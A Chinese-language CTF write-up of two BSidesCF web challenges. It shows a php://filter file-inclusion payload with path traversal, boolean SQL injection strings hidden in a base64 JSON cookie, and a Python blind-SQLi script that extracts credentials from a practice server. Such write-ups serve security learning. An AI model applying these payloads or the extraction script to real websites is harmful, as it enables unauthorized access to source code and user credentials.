BSidesCF-web

无前言，就这样吧，太菜了

题解

[BSidesCF 2020]Had a bad day

考察：php伪协议，文件包含漏洞

然后尝试用伪协议，读取index.php，本来用index.php，后来发现可能后端有自动补充.php

php://filter/read=convert.base64-encode/resource=index

读出源码

<?php

$file = $_GET['category'];
if(isset($file)) {
	if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")) {
		include ($file . '.php');
	} else {
		echo "Sorry, we currently only support woofers and meowers.";
	}
}
?>

exp:

php://filter/read=convert.base64-encode/resource=woofers/../flag

[BSidesCF 2019]Sequel

考察：cookie处sql盲注

这题好坑啊，要用guest/guest才能登陆

登陆后用burp抓包

cookie这是base64加密

{"username":"guest","password":"guest"}

然后测试sql漏洞

{"username":"\" or 1=2 or \"","password":"guest"}   Invalid user.
{"username":"\" or 1=1 or \"","password":"guest"}   正常返回

编写exp

import requests
import base64
import string
flag = ""
ss = string.printable
url = "http://d9ab3ff1-6200-413b-88d1-287603ee7687.node3.buuoj.cn/sequels"
for x in range(1,10):
    for i in range(1,32):
        for y in ss:
            exp = '{{"username":"\\" or (substr((select username from userinfo limit {0},1),{1},1)=\\"{2}\\")or \\"","password":"guest"}}'.format(x,i,y)
            print exp
            cookies = {
                "1337_AUTH": base64.b64encode(exp)
            }
            content = requests.get(url=url,cookies=cookies).content
            if "Sequel" in content:
                flag += y
                print flag
                break

然后爆出账号密码

username:sequeladmin
password:f5ec3af19f0d3679e7d5a148f4ac323

登陆就可以获得flag